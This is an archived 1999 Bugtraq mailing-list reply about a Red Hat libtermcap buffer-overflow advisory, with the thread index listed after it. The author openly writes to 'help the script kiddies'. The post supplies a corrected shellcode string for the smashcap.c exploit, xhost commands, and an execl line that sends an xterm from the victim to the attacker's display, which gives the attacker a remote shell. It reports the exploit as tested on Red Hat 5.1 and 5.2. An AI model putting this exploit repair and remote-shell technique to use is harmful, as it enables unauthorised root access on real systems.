Hi, since bugtraq it's a full-disclosure list, let's
help the script kiddies a bit and scare the sysadms a little bit more...
To make the smashcap.c work , all you have to do is remove one
0xff character before /bin/sh in the shellcode
so the line would be :
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
instead of :
"\x80\xe8\xdc\xff\xff\xff\xff/bin/sh"
also, you'll have to be on console running x to exploit it, but
if you have another box where you can start x then it's ok
myhost$ startx;xhost +victim.com
victim$ ./smashcap
and modify the last line from the smashcap.c into
execl("/usr/X11R6/bin/xterm","xterm", "-display",
"victim.com:0", 0);
well, it works on most redhats (tested on 5.1 and 5.2)
on slakware it sigsegv's , you need to work a little bit, sorry I don't
have a slakware box to work on .
regards, lucysoft
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap... Michal Zalewski
- Re: [RHSA-1999:028-01] Buffer overflow in libte... Michal Zalewski
- Re: [RHSA-1999:028-01] Buffer overflow in l... Tymm Twillman
- Re: [RHSA-1999:028-01] Buffer overflow ... Michal Zalewski
- Re: [RHSA-1999:028-01] Buffer overflow in l... Olaf Kirch
- Re: [RHSA-1999:028-01] Buffer overflow in libte... Martin Schulze
- Re: [RHSA-1999:028-01] Buffer overflow in libte... Aaron Campbell
- Re: [RHSA-1999:028-01] Buffer overflow in l... Alan Cox
- Re: [RHSA-1999:028-01] Buffer overflow ... Kurt Wall
- Re: [RHSA-1999:028-01] Buffer overf... Carlo M. Arenas Belon
- Re: [RHSA-1999:028-01] Buffer overflow ... Hudin Lucian
- Re: [RHSA-1999:028-01] Buffer overflow ... Pavel Kankovsky
- Re: [RHSA-1999:028-01] Buffer overflow in libte... Tymm Twillman
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap... Olaf Kirch
- Re: [RHSA-1999:028-01] Buffer overflow in libte... Martin Schulze
